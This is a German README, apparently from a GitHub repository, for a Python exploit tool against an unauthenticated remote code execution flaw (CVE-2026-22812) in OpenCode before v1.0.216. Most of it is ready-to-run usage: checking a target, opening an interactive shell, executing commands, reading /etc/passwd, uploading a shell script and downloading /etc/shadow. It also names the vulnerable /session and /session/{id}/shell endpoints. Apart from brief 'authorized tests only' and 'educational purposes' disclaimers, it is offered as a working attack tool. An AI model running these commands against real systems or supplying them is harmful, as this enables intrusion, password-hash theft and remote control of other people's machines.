
Python-Exploit-Tool für OpenCode RCE (CVE-2026-22812), das Befehlsausführung, Datei lesen/schreiben/hochladen/herunterladen sowie eine interaktive Shell für autorisierte Penetrationstests bereitstellt.
Ein Python-Exploitationstool für die OpenCode Remote Code Execution (RCE)-Schwachstelle, die Versionen < v1.0.216 betrifft. Dieses Tool bietet mehrere Angriffsvektoren, darunter Befehlsausführung, Datei-Lesen/-Schreiben, Datei-Upload/-Download und eine interaktive Shell.
⚠️ NUR FÜR AUTORISIERTE TESTS ⚠️
# Repository klonen
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812
# Abhängigkeiten installieren
pip install requests urllib3
# Ausführbar machen (optional)
chmod +x CVE-2026-22812.py
requests-Bibliothekurllib3-Bibliothekpython3 CVE-2026-22812.py -t http://target:port [Optionen]
# Prüfen, ob das Ziel verwundbar ist
python3 exploit.py -t http://10.0.0.1:4096 --check
# Interaktive Shell
python3 exploit.py -t http://10.0.0.1:4096 -i
# Einzelnen Befehl ausführen
python3 exploit.py -t http://10.0.0.1:4096 -c "id"
# Datei lesen
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd
# Datei hochladen
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh
# Datei herunterladen
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt
# Systeminformationen abrufen
python3 exploit.py -t http://10.0.0.1:4096 --info
# Proxy verwenden (Burp Suite, etc.)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080
Sobald Sie sich in der interaktiven Shell befinden (-i-Flag), können Sie Folgendes verwenden:
<Befehl> Shell-Befehl ausführen
help Hilfemenü anzeigen
exit Shell verlassen
session Sitzungs-ID anzeigen
stats Exploitationsstatistiken anzeigen
read <Datei> Dateiinhalt lesen
download <remote> <lokal> Datei herunterladen
upload <lokal> <remote> Datei hochladen
sysinfo Systeminformationen abrufen
Die Schwachstelle existiert im Sitzungsverwaltungs-Endpunkt (/session), der es nicht authentifizierten Benutzern ermöglicht, Sitzungen zu erstellen und beliebige Befehle über den Endpunkt /session/{id}/shell auszuführen.
POST /session - Sitzung erstellenPOST /session/{id}/shell - Befehle ausführenGET /file/content - Dateien lesenCVE-2026-22812.py
├── Colors-Klasse (ANSI-Farbcodes)
├── print_banner() (Banner anzeigen)
├── Exploit-Klasse (Haupt-Exploit-Logik)
│ ├── __init__() (Initialisierung)
│ ├── check_vuln() (Schwachstellenprüfung)
│ ├── create_session() (Sitzung erstellen)
│ ├── exec_cmd() (Befehl ausführen)
│ ├── read_file() (Datei lesen)
│ ├── write_file() (Datei schreiben)
│ ├── upload() (Datei hochladen)
│ ├── download() (Datei herunterladen)
│ ├── get_info() (Systeminformationen)
│ ├── shell() (Interaktive Shell)
│ └── Hilfsmethoden
└── main() (Argumentanalyse)
Dieses Tool wird nur zu Bildungszwecken veröffentlicht. Verwendung auf eigene Gefahr.
Bei Problemen und Fragen: